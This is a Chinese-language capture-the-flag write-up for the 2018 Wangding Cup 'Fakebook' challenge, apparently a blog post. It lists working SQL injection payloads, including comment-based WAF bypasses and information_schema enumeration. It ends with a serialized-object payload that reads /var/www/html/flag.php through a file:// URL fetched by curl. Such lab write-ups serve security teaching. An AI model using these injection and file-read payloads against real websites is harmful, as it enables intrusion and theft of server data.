[网鼎杯 2018] Fakebook

发布于 2021-08-06  77 次阅读


image-20201117162010730.png

打开题目注册登录 得到如上界面

image-20201117162057215.png

查看源码,发现一个view.php

image-20201117162154602.png

输出单引号报错,可能存在sql注入,进行下一步尝试。

view.php?no=1 and 1=1
view.php?no=1 and 1=2
view.php?no=1 order by 5
view.php?no=0 union select 666,777,888,999
这里发现触发了WAF,尝试内联注释,混淆绕过
view.php?no=0 /**/union/**/select/**/ 666,777,888,999
view.php?no=0 /**/union/**/select/**/ 666,database(),888,999
库名:fakebook
view.php?no=0 /**/union/**/select/**/ 1,table_name ,3,4 from information_schema.tables where table_schema='fakebook'
表名:users
view.php?no=0 /**/union/**/select/**/ 1,column_name,3,4 from information_schema.columns where table_schema=database() and table_name='users'
字段名:no username passwd data
view.php?no=0 /**/union/**/select/**/ union/**/select 1,data,3,4 from fakebook.users
O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:123;s:4:"blog";s:12:"ww.baidu.com";}

得到一个反序列化串

用dirsearch扫一遍目录啥也没有

查看robots.txt(常用知识点一定要记住)

image-20201117163636406.png

下载下来得到 一份源码

<?php


class UserInfo
{
public $name = "";
public $age = 0;
public $blog = "";

public function __construct($name, $age, $blog) //赋值u
{
$this->name = $name;
$this->age = (int)$age;
$this->blog = $blog;
}

function get($url) //自定义函数
{
//初始化 cURL 会话
$ch = curl_init();

//设置url和相对应的选项
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

//抓取url并把它传递给浏览器
$output = curl_exec($ch);
$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
if($httpCode == 404) {
return 404;
}
//关闭curl资源,并释放系统资源
curl_close($ch);

return $output;
}

public function getBlogContents ()
{
return $this->get($this->blog);
}

public function isValidBlog ()
{
$blog = $this->blog;
return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);
}

}

思路明确:利用反序列化和伪协议读取直接flag.php

image-20201117163927077.png

结合之前的报错信息,可以推测路径为 /var/www/html/flag.php

因此 写php代码 构建payload

image-20201117164206072.png

因为data是第四个字段 因此最终的payload为

http://b5de29d4-cf0b-47f7-a63d-7edf1fc2a2c4.node3.buuoj.cn/view.php?no=0%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:5:%22admin%22;s:3:%22age%22;i:123;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27